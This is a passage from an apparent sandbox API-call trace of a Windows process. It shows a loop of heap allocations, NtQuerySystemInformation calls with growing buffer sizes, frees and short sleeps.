ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.192] Sleep (dwMilliseconds=0x110) [0205.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.207] Sleep (dwMilliseconds=0x110) [0205.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.224] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.224] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.225] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.225] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.225] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.226] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.226] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.226] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.226] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.231] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.232] Sleep (dwMilliseconds=0x110) [0205.255] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.255] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.256] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.256] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.256] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.257] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.257] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.257] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.258] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.258] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.258] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.258] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.258] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.259] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.261] Sleep (dwMilliseconds=0x110) [0205.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.268] Sleep (dwMilliseconds=0x110) [0205.286] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.286] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.287] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.287] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.287] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.287] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.287] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.288] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.288] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.288] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.288] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.288] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.289] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.289] Sleep (dwMilliseconds=0x110) [0205.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.294] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.297] Sleep (dwMilliseconds=0x110) [0205.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.318] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.319] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.319] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.319] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.320] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.320] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.321] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.321] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.321] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.321] Sleep (dwMilliseconds=0x110) [0205.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.334] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.334] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.335] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.336] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.336] Sleep (dwMilliseconds=0x110) [0205.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.346] Sleep (dwMilliseconds=0x110) [0205.356] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.356] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.364] Sleep (dwMilliseconds=0x110) [0205.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.382] Sleep (dwMilliseconds=0x110) [0205.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.412] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.413] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.413] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.414] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.414] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.414] Sleep (dwMilliseconds=0x110) [0205.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.434] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.436] Sleep (dwMilliseconds=0x110) 